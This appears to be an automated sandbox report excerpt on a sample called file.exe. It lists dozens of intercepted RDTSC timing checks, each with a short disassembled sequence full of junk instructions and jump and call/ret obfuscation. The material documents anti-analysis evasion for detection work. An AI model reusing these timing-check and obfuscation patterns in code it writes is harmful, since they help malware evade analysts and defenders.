                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FBB68 second address: 11FBC0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 12E99FC2h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007EFEB92DE1E8h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a stc 0x0000002b mov edi, 6966E453h 0x00000030 add ch, FFFFFF95h 0x00000033 push 00000003h 0x00000035 jmp 00007EFEB92DE1F4h 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007EFEB92DE1E8h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 00000017h 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 mov dword ptr [ebp+122D2D0Eh], eax 0x0000005c push 00000003h 0x0000005e mov di, ax 0x00000061 push 7D46B821h 0x00000066 push eax 0x00000067 push edx 0x00000068 js 00007EFEB92DE1FFh 0x0000006e jmp 00007EFEB92DE1F9h 0x00000073 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FBC0E second address: 11FBC47 instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFEB91CA54Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 42B947DFh 0x00000011 push esi 0x00000012 pushad 0x00000013 mov ax, bx 0x00000016 popad 0x00000017 pop edi 0x00000018 lea ebx, dword ptr [ebp+1244D988h] 0x0000001e mov edx, dword ptr [ebp+122D281Eh] 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jns 00007EFEB91CA54Ch 0x0000002d jno 00007EFEB91CA546h 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FBC47 second address: 11FBC56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFEB92DE1EBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FBCE3 second address: 11FBD26 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 ja 00007EFEB91CA550h 0x0000000d nop 0x0000000e call 00007EFEB91CA54Dh 0x00000013 mov dword ptr [ebp+122D2C94h], ecx 0x00000019 pop esi 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D2C1Eh], eax 0x00000022 push DD7F7680h 0x00000027 push eax 0x00000028 push edx 0x00000029 jo 00007EFEB91CA54Ch 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FBD26 second address: 11FBD2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FBD2A second address: 11FBDD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFEB91CA558h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d add dword ptr [esp], 22808A00h 0x00000014 mov edi, eax 0x00000016 push 00000003h 0x00000018 cld 0x00000019 push 00000000h 0x0000001b push 00000003h 0x0000001d movsx edx, dx 0x00000020 push 905D6172h 0x00000025 jns 00007EFEB91CA55Bh 0x0000002b add dword ptr [esp], 2FA29E8Eh 0x00000032 call 00007EFEB91CA558h 0x00000037 mov edi, 749094C1h 0x0000003c pop ecx 0x0000003d lea ebx, dword ptr [ebp+1244D991h] 0x00000043 jmp 00007EFEB91CA54Fh 0x00000048 xchg eax, ebx 0x00000049 jmp 00007EFEB91CA552h 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 push edi 0x00000053 pop edi 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FBDD0 second address: 11FBDD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FBE43 second address: 11FBE74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 mov di, EFD6h 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f jmp 00007EFEB91CA553h 0x00000014 pop edi 0x00000015 push 7104CA0Ch 0x0000001a pushad 0x0000001b jo 00007EFEB91CA54Ch 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FBE74 second address: 11FBF09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFEB92DE1F4h 0x00000009 popad 0x0000000a xor dword ptr [esp], 7104CA8Ch 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007EFEB92DE1E8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b push 00000003h 0x0000002d sub ecx, dword ptr [ebp+122D27CEh] 0x00000033 push 00000000h 0x00000035 mov edx, dword ptr [ebp+122D28F6h] 0x0000003b push 00000003h 0x0000003d call 00007EFEB92DE1F3h 0x00000042 jnl 00007EFEB92DE1FCh 0x00000048 pop ecx 0x00000049 push FE55B627h 0x0000004e push eax 0x0000004f push edx 0x00000050 jl 00007EFEB92DE1ECh 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FBF09 second address: 11FBF0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FBF0D second address: 11FBF68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 3E55B627h 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007EFEB92DE1E8h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a mov edi, eax 0x0000002c lea ebx, dword ptr [ebp+1244D99Ch] 0x00000032 sub dword ptr [ebp+122D2062h], eax 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b js 00007EFEB92DE1F2h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BFDA second address: 121BFE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BFE1 second address: 121BFE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BFE9 second address: 121BFEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BFEE second address: 121BFF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BFF6 second address: 121C06C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007EFEB91CA554h 0x00000010 jmp 00007EFEB91CA553h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c ja 00007EFEB91CA54Eh 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 pushad 0x00000026 popad 0x00000027 jmp 00007EFEB91CA558h 0x0000002c jmp 00007EFEB91CA551h 0x00000031 popad 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C477 second address: 121C48E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007EFEB92DE1F0h 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C5E0 second address: 121C5F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA54Fh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C5F4 second address: 121C5FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C5FC second address: 121C602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C602 second address: 121C614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007EFEB92DE1E6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C614 second address: 121C618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C618 second address: 121C64A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007EFEB92DE1F7h 0x0000000c jmp 00007EFEB92DE1EFh 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C64A second address: 121C650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C650 second address: 121C654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C7BC second address: 121C7ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnc 00007EFEB91CA546h 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007EFEB91CA553h 0x00000013 push edi 0x00000014 pop edi 0x00000015 jmp 00007EFEB91CA54Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C957 second address: 121C977 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007EFEB92DE1F7h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121CA92 second address: 121CA98 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121CA98 second address: 121CA9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121CA9E second address: 121CAA3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121CF19 second address: 121CF1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121CF1F second address: 121CF29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007EFEB91CA546h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121D090 second address: 121D0BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007EFEB92DE1EAh 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007EFEB92DE1EDh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121D0BF second address: 121D104 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFEB91CA552h 0x00000008 jmp 00007EFEB91CA559h 0x0000000d jmp 00007EFEB91CA555h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120FFF0 second address: 1210011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007EFEB92DE1F4h 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1210011 second address: 121001B instructions: 0x00000000 rdtsc 0x00000002 jng 00007EFEB91CA546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121001B second address: 1210027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1210027 second address: 121002B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121002B second address: 121002F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E8067 second address: 11E806D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E806D second address: 11E8071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E8071 second address: 11E8088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007EFEB91CA546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d js 00007EFEB91CA546h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121D409 second address: 121D41E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007EFEB92DE1E6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c jne 00007EFEB92DE1E6h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121D9BE second address: 121D9DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007EFEB91CA557h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121D9DD second address: 121D9E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121D9E3 second address: 121D9F4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFEB91CA548h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121D9F4 second address: 121D9FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121D9FE second address: 121DA02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121DA02 second address: 121DA08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121DB76 second address: 121DB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121DEA9 second address: 121DEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 jmp 00007EFEB92DE1EEh 0x0000000b jmp 00007EFEB92DE1F9h 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007EFEB92DE1F2h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121DEEB second address: 121DEEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB64D second address: 11EB656 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB656 second address: 11EB694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007EFEB91CA553h 0x00000010 jno 00007EFEB91CA560h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122441E second address: 122442E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224552 second address: 1224579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007EFEB91CA54Ch 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007EFEB91CA550h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224579 second address: 122458F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122458F second address: 12245B7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007EFEB91CA54Eh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 pushad 0x00000011 js 00007EFEB91CA546h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12245B7 second address: 12245E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007EFEB92DE1EAh 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jp 00007EFEB92DE1FAh 0x00000017 pushad 0x00000018 jmp 00007EFEB92DE1ECh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229C58 second address: 1229C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jno 00007EFEB91CA55Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229C79 second address: 1229C99 instructions: 0x00000000 rdtsc 0x00000002 ja 00007EFEB92DE1EAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007EFEB92DE1E6h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229C99 second address: 1229CA3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007EFEB91CA546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229CA3 second address: 1229CD1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007EFEB92DE1EEh 0x00000008 jo 00007EFEB92DE202h 0x0000000e jmp 00007EFEB92DE1F6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1228FA4 second address: 1228FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1228FB1 second address: 1228FB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1228FB5 second address: 1228FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007EFEB91CA546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1228FC5 second address: 1228FC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1228FC9 second address: 1228FD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1228FD6 second address: 1228FDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1228FDA second address: 1228FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007EFEB91CA546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jl 00007EFEB91CA546h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1228FF3 second address: 1228FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229169 second address: 1229186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007EFEB91CA553h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229186 second address: 1229190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229190 second address: 12291D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFEB91CA558h 0x00000009 jmp 00007EFEB91CA54Fh 0x0000000e popad 0x0000000f push ecx 0x00000010 jmp 00007EFEB91CA54Ch 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 ja 00007EFEB91CA546h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12291D4 second address: 12291D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12291D8 second address: 12291DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12291DC second address: 12291E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122935D second address: 1229371 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007EFEB91CA54Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229371 second address: 1229380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFEB92DE1EBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229380 second address: 1229393 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA54Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122993A second address: 1229942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
